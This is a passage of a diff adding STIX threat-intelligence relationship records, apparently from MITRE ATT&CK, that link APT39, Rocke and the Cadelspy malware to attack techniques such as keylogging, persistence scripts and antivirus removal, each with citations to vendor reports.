+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used tools for capturing keystrokes.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0ddcf163-015f-46a2-8de7-375712d92bae",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.935Z",
+ "created": "2020-05-22T19:37:14.272Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a screen capture utility to take screenshots on a compromised host.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--932beba4-bb6a-4174-abe3-353d2e39337c",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.937Z",
+ "created": "2020-05-22T19:37:14.274Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "tool--9de2308e-7bed-43a3-8e58-f194b3586700",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3b1a912a-9854-428f-9dde-bd2100c554d8",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.489Z",
+ "created": "2020-05-22T19:37:14.489Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used SQL injection for initial compromise.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fab9f76e-570c-4235-8045-dec89714d435",
+ "type": "relationship",
+ "modified": "2020-05-22T20:04:15.481Z",
+ "created": "2020-05-22T20:04:15.481Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--59ad51ee-bc2e-4428-be3f-ddf50cf0deb9",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.510Z",
+ "created": "2020-05-22T20:27:31.510Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--dd812f2c-a0a0-4543-af23-25e71c899bf4",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.512Z",
+ "created": "2020-05-22T20:27:31.512Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--721b7c0a-4774-4b09-882f-be7ba1cab7a5",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.527Z",
+ "created": "2020-05-22T20:27:31.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--13e89239-af0e-4f3c-9bb9-42b113f64873",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.544Z",
+ "created": "2020-05-22T20:27:31.544Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--dfdd269c-9d78-46da-8b31-3141a5398bfd",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.549Z",
+ "created": "2020-05-22T20:27:31.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--d826904c-7853-4f85-a5e4-948b21ae374c",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.551Z",
+ "created": "2020-05-22T20:27:31.551Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--5c859db1-13ba-4bf8-a8d3-7fd99e061c45",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.553Z",
+ "created": "2020-05-22T20:27:31.553Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--26339d57-98d9-4323-97e8-03642f82e245",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.570Z",
+ "created": "2020-05-22T20:27:31.570Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--5e2b2df2-e54f-44b5-bd86-fefdae513bc2",
+ "type": "relationship",
+ "modified": "2020-05-22T20:29:56.339Z",
+ "created": "2020-05-22T20:29:56.339Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner connects to a C2 server using port 51640.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f7f947cd-6e0c-499c-8cdf-293e38657e31",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.411Z",
+ "created": "2020-05-26T16:17:59.411Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a430e3fa-bfc0-4ea8-8264-217f6aa015fc",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.416Z",
+ "created": "2020-05-26T16:17:59.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has installed an \"init.d\" startup script to maintain persistence.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6b1cc49f-8d94-4f59-a723-2a70c3edf760",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.425Z",
+ "created": "2020-05-26T16:17:59.430Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has changed the time stamp of certain files.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ff14431c-bf82-44be-b12a-a65e88d5347a",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.473Z",
+ "created": "2020-05-26T16:17:59.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a2f88508-4177-4294-b287-6a3494f6e738",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.476Z",
+ "created": "2020-05-26T16:17:59.476Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) can detect a running process's PID on the infected machine.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a3d2ef4a-2bca-482d-897b-99da14b16b52",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.484Z",
+ "created": "2020-05-26T16:17:59.484Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has deleted files on infected machines.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--dec705fd-139b-49d6-b0d8-888b2b922a12",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.535Z",
+ "created": "2020-05-26T16:17:59.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--674031ea-4fff-4669-b44b-d289fa1cc36e",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.535Z",
+ "created": "2020-05-26T16:17:59.542Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--78fc38f6-88ee-4f26-84e1-7532d95a4fbe",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.538Z",
+ "created": "2020-05-26T16:17:59.550Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5de38b67-dbc7-46bf-bb73-91cd0e069d05",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.556Z",
+ "created": "2020-05-26T16:17:59.556Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a1956344-1a2d-4193-bb20-0f65c98776fe",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.592Z",
+ "created": "2020-05-26T16:17:59.607Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them.(Citation: Talos Rocke August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--beae1b73-f369-4443-8e59-eb9e99665e8d",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.583Z",
+ "created": "2020-05-26T16:17:59.610Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) downloaded a file \"libprocesshider\", which could hide files on the target system.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--48141016-3fc6-46af-9f93-b52439ed78ea",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.620Z",
+ "created": "2020-05-26T16:17:59.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Unit 42 Rocke January 2019",
+ "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/",
+ "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ca1afca5-2f16-497e-bfff-1564706e05f2",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.626Z",
+ "created": "2020-05-26T16:17:59.626Z"
